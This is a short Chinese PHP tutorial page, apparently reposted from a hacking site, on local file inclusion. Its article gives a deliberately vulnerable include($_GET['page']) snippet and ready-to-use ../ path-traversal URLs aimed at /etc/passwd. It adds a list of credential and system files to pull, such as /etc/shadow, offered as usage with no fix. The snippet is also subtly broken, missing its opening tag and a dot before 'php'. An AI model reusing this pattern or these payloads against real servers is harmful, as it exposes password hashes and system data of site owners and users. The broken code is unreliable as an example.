社群 學習 工具庫 休閒
搜尋
繁体中文
首頁 > 後端開發 > php教程 > 主體

php 伪造本地文件包含漏洞的代码_php技巧

WBOY
發布: 2016-05-17 09:14:42
原創
1048 人瀏覽過

代码:

复制代码 代码如下:

$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach
相關標籤:
包含漏洞
來源:php.cn
上一篇:php数组函数序列之array_flip() 将数组键名与值对调_php技巧 下一篇:php数组函数序列之ksort()对数组的元素键名进行升序排序,保持索引关系_php技巧
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
作者最新文章
最新問題
PHP數組從URL參數中取得的行為不如預期 我有一個包含類別ID的URL參數,我想將其視為一個數組,如下所示:http://example.com?cat[]=3,9,13在PHP中,我使用它從URL參數取得數組:$catI...
來自於 2024-04-06 22:09:02
0
1
1428
查詢和公式形成整個表,帶有新列,其中新列是涉及其他條件列值的公式 編輯:公式應該是“值”列-根據類別具有最低user_id的“值”列。因此第2行將為0.04,因為類別「A」的最低「user_id」的「value」欄位是0.01。抱歉。我想從表中檢...
來自於 2024-04-06 21:23:40
0
2
530
如何在 CSS 中使浮動元素垂直堆疊而不是水平堆疊? 我正在嘗試製作一個包含兩列的網頁,一側具有主要內容,另一側具有額外的內容。但是因為我使用浮動屬性將額外的列向左對齊,所以它水平堆疊,但我希望它垂直堆疊。我目前的程式碼:.topic...
來自於 2024-04-06 20:45:26
0
2
386
如何在 livewire 惰性佔位符中使用 laravel 元件 我想在livewire3佔位符內添加我的laravel組件的骨架到目前為止我已經嘗試過:通過包含Laravel組件來實現Livewire類:publicfunctionplaceh...
來自於 2024-04-06 20:02:10
0
2
543
MySQL:'從......中選擇文字作為<此處變數或子查詢>” 我有下表,其中包含以下數據:id文本語言1德語文本德語2英文文本英語我想要的是獲得以下格式的結果:german="deutschertext"english=&...
來自於 2024-04-06 19:25:54
0
2
529
相關專題
更多>
熱門推薦
熱門教學
更多>
相關教學
熱門推薦
最新課程
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板